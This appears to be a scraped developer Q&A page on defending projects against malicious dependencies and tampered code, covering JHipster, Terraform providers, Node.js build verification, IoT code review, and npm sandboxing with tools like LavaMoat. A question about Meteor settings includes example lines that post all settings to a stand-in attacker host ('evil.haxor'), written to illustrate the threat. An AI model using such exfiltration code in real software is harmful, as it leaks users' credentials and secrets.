Is a project created using JHipster available to everyone? - jhipster

Hello folks, I am a newbie and I wanted to know: suppose I am creating a web application using JHipster, will my code be available to everyone?
I mean, will the code be submitted to the open source community?

The generated code belongs to you; it is not shared.
Now, if you're afraid of your code leaking out because you're working in a highly secured domain (e.g. Finance), it's another story.
The generator is open source so you can audit what it does.
But it would be simpler to configure your firewall to block unexpected outgoing traffic: the generator should only need to fetch artifacts from the public repositories (npm, Maven) during the generation phase.
It's like using a compiler: how do you know that it does not upload your source code somewhere? Either you audit the compiler's code, or you protect yourself with a firewall specifically configured each time you use it.
Finally, you should evaluate the risk of leaking generated code, which usually has little value compared with the code you add manually, which is where the business value lies.

Related

Terraform providers vulnerability detection

Using a lot of (official and non-official) Terraform providers, I'm looking for a tool to perform security analysis on Terraform providers before executing terraform plan/apply commands (and thus executing provider code). I want to prevent malicious code from providers from being executed blindly.
I'm basically executing the terraform providers mirror command to save local copies of the required providers, and I'm wondering if I can security-scan that result.
I tested kics, checkov and tfsec, but they all look for security issues in my static Terraform code, not in the providers.
Do you have any good advice regarding this topic?
This is actually quite a good question. Many other problems can be reduced to the same generic question: how do you make sure that the thing you downloaded from the internet does not do anything malicious to you? For example:
How to make sure that a minecraft plugin does not hack you?
How to make sure that a spring boot dependency does not hack you?
How to make sure that a library xxx you attach to your project does not do harm to you?
Should you use docker image yyy in your project?
The truth is: everything you use has the potential to explode right in your face (or more correctly: right in the face of the system owner). That's why the system owner (usually a company) defines a set of rules about what is and is not allowed. Not aware of any such rules? Below is the set of rules we came up with ourselves when thinking about on-boarding a new library for some projects to use:
Do not take random stuff from GitHub. Take only products with a longer history, a small bug backlog, little to no past issues in the CVE list, and active maintenance.
Do static code analysis yourself. Sometimes tools that work at the binary level can do that for you; sometimes you can do it at the source level only. In the case of Java libraries, check what tools like Dependency-Track think about the library and version you are about to use.
Run the code and see how it behaves: what it writes, what it reads, what URLs it communicates with (do a TCP dump if necessary).
Document everything you have done somewhere.
This gives you no 100% confidence that things will not go terribly wrong, but it is a systematic approach that will reduce the risk of doing something stupid.

Can a running nodejs application cryptographically prove it is the same as published source code version?

Can a running nodejs program cryptographically prove that it is the same as a published source code version in a way that could not be tampered with?
Said another way, is there a way to ensure that the commands/code executed by a nodejs program are all and only the commands and code specified in a publicly disclosed repository?
The motivation for this question is the following: in an age of highly sophisticated hackers, as well as pressure from government agencies for "backdoors" that allow them to snoop on private transactions and exchanges, can we ensure that an application has neither been hacked nor had a backdoor added?
As an example, consider an open source-based nodejs application like lesspass (lesspass/lesspass on github) which is used to manage passwords and available for use here (https://lesspass.com/#/).
Or an alternative program for a similar purpose encryptr (SpiderOak/Encryptr on github) with its downloadable version (https://spideroak.com/solutions/encryptr).
Is there a way to ensure that the versions available on their sites to download/use/install are running exactly the same code as is presented in the open source code?
Even if we have 100% faith in the integrity of the teams behind applications like these, how can we be sure they have not been coerced by anyone to alter the running/downloadable version of their program, to create a backdoor for example?
Thank you for your help with this important issue.
Sadly, no. Simple as that.
The long version:
You are dealing with the outputs of a program, and want to ensure that the output is generated by a specific version of one specific program.
Let's check a few things: can an attacker predict the outputs of said program?
If we are talking about open source programs, yes: an attacker can predict what you are expecting to see, and can even reproduce all the underlying crypto checks against the original source code, or against all internal states of said program.
Imagine running the program inside a virtual machine with full debugging support: firing events at certain points in the code, directly reading memory to extract cryptographic keys, and so on. The attacker does not even have to modify the program to be able to keep copies of everything you do in plaintext.
So even if you could cryptographically make sure that the code itself was not tampered with, it would be worth nothing: the environment itself could be designed to do something harmful, and as Maarten Bodewes wrote, in the end you need to trust something.
One could argue that a TPM could solve this, but I'm afraid of the world that leads to: in the end you still have to trust something, like a manufacturer, or worse, a public office signing keys for TPMs... and as we know, those would never, you hear, never have other intentions than what's good for you. So basically you wouldn't win anything with a centralized TPM-based infrastructure.
You can do this cryptographically by having a runtime that checks signatures before running any code. Of course, you'd have to trust that runtime environment as well. Unless you have such an environment you're out of luck - that is, unless you do a full code review.
Furthermore, you can sign the build by placing a signature within the build system. The build system and developer access can in turn be audited. This is usually how secure development environments are built. But in the end you need to trust something.
If you're just afraid that a particular download is corrupted you can test against an official hash published at one or more trusted locations.
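For that last case, here is a minimal Node.js sketch of the hash check (the file name and expected value below are hypothetical placeholders, not a real release hash):
const crypto = require('crypto');
const fs = require('fs');
// hash published at the trusted location (hypothetical value)
const expected = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855';
// compute the SHA-256 of the file you actually downloaded
const actual = crypto.createHash('sha256')
  .update(fs.readFileSync('lesspass-release.tar.gz'))
  .digest('hex');
console.log(actual === expected ? 'hash matches' : 'HASH MISMATCH - do not run');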

How to identify vulnerable code in an IoT node?

As part of an ongoing project of mine, my task is to identify instructions in code which are vulnerable to tampering.
The code would be running on an IoT device, and the instructions can be identified from either the source code or just the executable (with no source code).
Does anyone know about some tools or techniques?
In a nutshell, how to automatically locate security-sensitive code?
EDIT: I believe I have now come to understand my task better. I do not have to use a tool for protection, but rather devise a technique of my own to protect those of my code statements (written in the C language) which are vulnerable, especially anti-debugging statements.
Are there any heuristics for finding the vulnerable statements in the code, like authentication points and anti-debugging checks?
The fact that the software runs on a device does not make it different from software running on a web server or a local/cloud computer.
What you might want to do is look at all the individual components in your setup that might expose a vulnerability.
The representation below is one that I often use for describing a connected product at the highest level. It contains:
The device (often running C or C++ code)
The connection to the cloud (e.g. HTTPS or a messaging service)
The API to the cloud (often a RESTful API)
The software on the cloud itself
You can go through these one by one and identify what might be wrong. As a rule of thumb, you can always try to find the spot where an outside connection is made.
Follow these four steps:
Check whether the code can be tampered with before an outside connection is made. If your code is compiled and makes an outside connection, try to find an alternative that you can validate.
Check certificates, messaging protocols, etc. Make sure all connections follow safety standards (see the sketch after this list).
Make sure your API follows proper RESTful security measures.
Validate the software in the cloud, check certificates, and use something like OAuth.
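As an illustration of the certificate checks in step 2, here is a minimal Node.js sketch of certificate pinning for the device-to-cloud connection (the hostname and fingerprint are hypothetical placeholders; the same idea applies to a C client):
const https = require('https');
// SHA-256 fingerprint of the server certificate you expect (placeholder)
const EXPECTED_FP = 'AA:BB:CC:...';
const req = https.request({
  hostname: 'api.example-iot-cloud.com',
  path: '/telemetry',
  // replaces the default hostname check with a fingerprint comparison;
  // returning an Error aborts the TLS handshake
  checkServerIdentity: (host, cert) => {
    if (cert.fingerprint256 !== EXPECTED_FP) {
      return new Error('certificate fingerprint mismatch - possible MITM');
    }
    return undefined;
  },
}, res => res.resume());
req.end();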
Last, check services like https://www.checkmarx.com/

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I've tested, and these two things are allowed in 3rd party packages:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post by which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all that is on their plates (Windows support, a non-Mongo DB). I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security-auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem, and the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should, be a notion of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the settings being (easily) modifiable at runtime, could be addressed by making the settings object read-only, using ES5 properties.
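A minimal sketch of that read-only idea (note it only stops runtime modification; it does not stop a package from reading or exfiltrating the values):
// recursively freeze the settings object at server startup, so later
// property writes throw in strict mode (or silently fail otherwise)
function deepFreeze(obj) {
  Object.getOwnPropertyNames(obj).forEach(function (name) {
    const value = obj[name];
    if (value && typeof value === 'object') deepFreeze(value);
  });
  return Object.freeze(obj);
}
// e.g. in server startup code:
// deepFreeze(Meteor.settings);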
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging. Unfortunately, if your application communicates with any sort of social network (Facebook, Twitter) then the firewall idea will not handle malware that uses Twitter as a way to transmit data. But maybe it would help?
lock down DNS resolution and provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'.
There are other more advanced detectors, but at some point a hacker is going to go after the other services running on the box rather than try to modify your code.
Good luck. And it's good to be paranoid, because they really are out to get you.

How to prevent malicious *.js scripts from executing in Node.js

I'm using Node.js to create a web service. In the implementation, I consume many third-party modules which are installed via npm. There is a security issue if there are malicious *.js scripts in the consumed modules. For example, malicious code might delete all my disk files, or silently collect secret data.
I have a couple of questions regarding this.
How to detect if there is a security issue in the module?
What should I do to prevent malicious *.js scripts from executing in Node.js?
I would very much appreciate it if you could share any experience of building a Node.js service.
Thanks,
Jeffrey
One concern you did not raise is that a module might try to make a direct connection to your database itself, or to other services on your internal network. This might be prevented by setting passwords which the module cannot find so easily.
1. Restricting disk access
This project was presented at NodeConf last year. It attempts to restrict filesystem access in precisely the situation you describe.
https://github.com/yahoo/fs-lock
"The goal for this module is to help when you are loading 3rd party modules and you need to restrict their access."
It sounds rather like the proposal Jeffrey made in the comments in Plato's answer.
(If you want to look further into hooking OS calls, this hookit project may present a few ideas. Although in its current form it only wraps the callback function, it might provide inspiration of what to hook, and how. Here is an example of it being used.)
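To illustrate the wrapping idea in a crude way (this is not fs-lock's actual API, just a sketch of the general approach; the allowed directory is a hypothetical example):
const fs = require('fs');
const path = require('path');
// hypothetical directory that 3rd-party code is allowed to read from
const ALLOWED_ROOT = path.resolve(__dirname, 'data');
const realReadFile = fs.readFile;
fs.readFile = function (file, ...args) {
  const resolved = path.resolve(String(file));
  if (!resolved.startsWith(ALLOWED_ROOT + path.sep)) {
    const err = new Error('fs access denied: ' + resolved);
    const cb = args[args.length - 1];
    if (typeof cb === 'function') return cb(err);
    throw err;
  }
  return realReadFile.call(fs, file, ...args);
};
A determined module can of course bypass a wrapper like this (via other fs methods, or native extensions), which is why serious tools hook at a lower level.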
2. Analyse flow of sensitive data
If you are only worried about data-stealing (not filesystem or database access), then you can focus your concerns:
You should be most concerned about those packages which are being passed sensitive data. Presumably some of the data on your web-service is presented to the public anyway!
Most packages will not have access to the full stack of your application, only the bits of data you pass them. If a package is only being passed a small amount of sensitive data, and never passed the rest of the data, it may not be able to do anything malicious with the data it receives. (For example, if you pass all your usernames to one package for processing and all your addresses to a different package, that is a much smaller concern than if you pass all your usernames, addresses and credit-card numbers to the same package!)
Identify the sensitive data in your app, and note which functions in which modules they are passed to.
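As a tiny illustration of passing only the minimum (the package name here is hypothetical):
const formatAddress = require('some-address-lib'); // hypothetical package
// pass only the fields the package needs, never the whole user record:
formatAddress({ street: user.street, city: user.city });
// not: formatAddress(user) -- which would also hand over card numbers, etc.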
3. Perform efficient code review
You may not need to go to GitHub to read the code. The great majority of packages provide all their source code in their install folder inside node_modules. (There are a few packages which provide binaries, however; these are naturally harder to verify.)
If you do want to check the code yourself, there may be ways to reduce the amount of work involved:
To secure your own app, you do not need to read the entire source code of all packages in your project. You only need to review those functions which are actually called.
You may trace the code by reading it, or with the aid of a text-based debugger, or a GUI debugger. (Of course you should look out for branching, where different inputs may cause different parts of the module to be called.)
Set breakpoints when you call into a module which you don't trust, so you can step through the code that is called and see what it does. You may be able to conclude that only a small part of the module is used, so only that code needs to be verified.
Whilst tracing flow should cover concerns about sensitive data at runtime, to check for file access or database access, we should also look at the initialisation code of each module which is required, and all calls (including requires) which are made from there.
4. Other measures
It might be wise to lock the version number of each package in package.json so that you don't accidentally install a new version of a package until you decide that you need to.
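For example, exact versions instead of ranges (the packages and versions here are just illustrative):
"dependencies": {
  "express": "4.18.2",
  "lodash": "4.17.21"
}
A caret range like "^4.18.2" would let newer minor versions be installed automatically, which defeats the purpose here.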
You may use social factors to build confidence in a package. Check the respectability of the author. Who is he, and who does he work for? Do the author and his employers have a reputation to uphold? Similarly, who uses his project? If the package is very popular, and used by industry giants, it is likely that others have already reviewed the code.
You may wish to visit github and enable notifications for all the top-level modules you are using, by "watching" the repository. This will inform you if any vulnerabilities are reported in the package in future.
Most (all?) modules have source code available on GitHub; you can read through the source and look for security problems, or hire a security professional to do the job.
I just take the risk, although I tend to use popular packages with hundreds of commits, active maintenance, and issue lists.
If your project dependency tree is large enough, reviewing all of your dependencies is not a feasible long-term strategy.
The original answer from Joey has some good countermeasures you can use for specific scenarios. I've also seen https://github.com/berstend/node-safe - it could make you slightly safer on a Mac.
A general solution to the problem is taking shape though.
How to protect a project from malicious packages
make sure you don't run lifecycle (postinstall) scripts unless they're known and necessary (see my talk on this topic)
put 3rd-party code in a compartment, lock down the environment, and decide which powerful APIs to pass to each package.
The second step requires the use of a Compartment, which is a work-in-progress in TC39: https://github.com/tc39/proposal-compartments/
But a shim exists, and some tooling has been built on top of that shim.
You could use the SES-shim directly and implement your own controls, or use the convenience of LavaMoat
LavaMoat lets you generate and tweak a per-package policy where you can decide which globals and builtins it should have access to.
LavaMoat also offers a tool to manage install scripts.
Here's my talk on SES and LavaMoat with a demo at the end.
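For the do-it-yourself route with the SES shim, a minimal sketch (the evaluated string stands in for real package code; endow only what each package genuinely needs):
require('ses'); // installs lockdown, harden and Compartment as globals
lockdown();     // freezes the shared intrinsics
const compartment = new Compartment({
  // the only capability this compartment receives:
  console: harden({ log: console.log }),
});
// code evaluated here sees no require, no process, no fs
compartment.evaluate('console.log(typeof process); // logs "undefined"');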
How to set up LavaMoat
See LavaMoat docs for more details
disable/allow dependency lifecycle scripts (e.g. "postinstall") via @lavamoat/allow-scripts
npm i --ignore-scripts -D @lavamoat/allow-scripts
npx --no-install allow-scripts setup
npx --no-install allow-scripts auto
then, edit the allow-list in package.json
after every install/reinstall, run allow-scripts
run your server or build process in lavamoat-node
npm i -D lavamoat
in your package.json add something like:
"scripts": {
"lavamoat-policy": "lavamoat app.js --autopolicy",
"start": "lavamoat app.js"
run lavamoat-policy every time you make changes to your dependency tree and review the policy (see also: policy override)
run npm start to start your app
Disclaimer: I contribute to LavaMoat and Endo. They are open source projects under permissive licenses.
